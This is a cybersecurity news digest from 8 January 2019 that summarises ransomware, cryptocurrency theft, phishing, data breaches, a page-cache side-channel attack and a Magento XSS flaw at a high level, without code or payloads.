Threat Reports

Silobreaker Daily Cyber Digest – 08 January 2019

 

Malware

CryptoMix ransomware exploits stories of children’s cancer treatments

  • Coveware researchers reported that CryptoMix ransomware is newly being distributed alongside a ransom note that claims the ransom payments will be donated to a fictional charity supporting child cancer treatments.
  • Moreover, the ransom note provides the names, diagnoses and photos of real child cancer patients that have been stolen from legitimate crowdfunding sites and local news stories.  

Source  

 

Ongoing Campaigns

Approximately $500,000 Ethereum Classic coin stolen

  • Nearly $500,000 worth of Ethereum Classic (ETC) was stolen after attackers carried out a rollback attack which allowed them to rewrite its blockchain. This allowed the attackers to recover previously spent coins and transfer them to a new entity.
  • The attackers ‘double spent’ approximately 88,500 ETC in total, the equivalent of $460,000.

Source

 

Cyber criminals targeting British TV license holders

  • Action Fraud reported a rise in phishing scams over recent months asking victims to correct their TV licensing information and billing information. Over 5,000 complaints were made since October 2018 by victims who inadvertently handed over their personal and financial data to the criminals.

Source

 

OXO International discloses data breaches spanning two years

  • The company stated that over various time periods between June 9th, 2017 and October 16th, 2018, their servers were compromised by attackers attempting to steal customer and payment information.
  • BleepingComputer’s analysis of the attacks demonstrated that at least one of the compromises was a Magecart attack.

Source

 

Hacker Groups  

Researchers discover ChinaZ’s relationships to other Chinese DDoS threat actors

  • Intezer researchers analysed recent activity attributed to Chinese threat actor ChinaZ, leading them to uncover the threat actor’s possible relationships to other threat actors within the Chinese Distributed-Denial-of-Service (DDoS) landscape, including those responsible for Nitol backdoor or MrBlack malware, or the Iron Tiger APT.
  • They were led to their findings by analysing various tools used by ChinaZ such as the BillGates botnet, Gh0st RAT variants or ServStart trojan.
  • Their blog post provides a detailed overview of their initial discovery of ChinaZ, an analysis of malicious payloads used by the group and evidence of the potential relationships to other threats.

Source (Includes IOCs)

 

Leaks and Breaches

Google email users notified of private data exposed by Google+ API bug

  • The bug allowed apps that were given permission to view a user’s profile data to also see private data that those users were not permitted access to. Affected Google users were alerted to which fields were exposed and the associated apps that granted access to them.
  • Over 50 million users were affected by the bug that was first disclosed in December 2018.

Source

 

Australian real estate network First National suffers data leak

  • Gareth Llewellyn reported the leak on Twitter, noting that the CVs and cover letters of an estimated 2,000 job applicants to First National were inadvertently exposed online.
  • Llewellyn surmised that a third party commercial vendor was responsible for the leak.

Source

 

Realtime Indian bus data publicly available

  • An ElasticSearch server that did not require a password publicly exposed live GPS data of over 11,000 Indian buses for approximately three weeks. Details included licence plates, exact route start and stop locations, names of routes and real time GPS coordinates.
  • The server has been accessible since at least November 30th, 2018, however, it is unclear how long the server has been available prior to this date. It is unclear who the server belongs to, though it has been secured by India’s CERT team.

Source

 

Canadian senator’s personal data leaked following Twitter hack

  • Senator Linda Frum’s Twitter account was hacked and the perpetrators behind the attack posted photos of Frum’s driving license online. The hackers referred to themselves as the ‘Spank Gang’.

Source

 

Credit-card skimmer on DiscountMugs.com website steals four months of customer data

  • In an official statement, the online custom mug and apparel retailer disclosed that hackers stole credit card numbers from customers who made orders through their website between August 5th and November 16th, 2018.
  • Through a skimmer placed on DiscountMugs.com’s payment portal, the perpetrators were also able to steal other information including credit card security codes and expiration dates, names, addresses, phone numbers, email addresses and ZIP codes. The number of customers affected remains unknown.

Source

 

Vulnerabilities

New side-channel attack technique discovered

  • A research paper published by academics and researchers from the Graz University of Technology, Boston University, NetApp, CrowdStrike and Intel, describes a side-channel attack that targets page caches. It abuses mechanisms designed to allow an application to check if a memory page is present in an operating system’s page cache. They can then create page eviction states that release old memory pages from the page cache, and the data contained within can be deduced by other processes and applications whilst this is happening.
  • This attack is capable of recovering large amounts of data at once. It is capable of capturing six keystrokes per second, which is enough to accurately capture keystrokes. Windows and Linux systems are vulnerable to the attack, and macOS systems are thought to be vulnerable too. Microsoft has since produced a fix regarding how Windows deals with page cache reads.

Source

 

Fortiguard Labs discovers new XSS vulnerability affecting Magento Commerce

  • The flaw is caused by Magento failing to sanitise data supplied by users before inserting it into dynamically generated widget form. The flaw could allow a remote hacker to execute arbitrary code on a victim’s browser and access sensitive data by gaining control of high-privilege accounts or take control of vulnerable websites.
  • The flaw affects Magento Commerce 2.1 prior to 2.1.16, and Magento Commerce 2.2 prior to 2.2.7.

Source

 

The Silobreaker Team

Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein. 

More News

  • Silobreaker Daily Cyber Digest – 23 January 2019

      Malware New ransomware family Anatova discovered on private peer-to-peer network McAfee researchers discovered ransomware, dubbed Anatova, that ciphers files before requesting a ransom...
  • Silobreaker Daily Cyber Digest – 22 January 2019

      Malware New STOP ransomware variant distributed through software cracks and adware bundles A new STOP ransomware variant is being bundled with adware and...
  • Silobreaker Daily Cyber Digest – 21 January 2019

      Malware Check Point release an update on GandCrab variant Check Point have published an update to their previous report on GandCrab, reviewing how...
View all News

Request a demo

Get in touch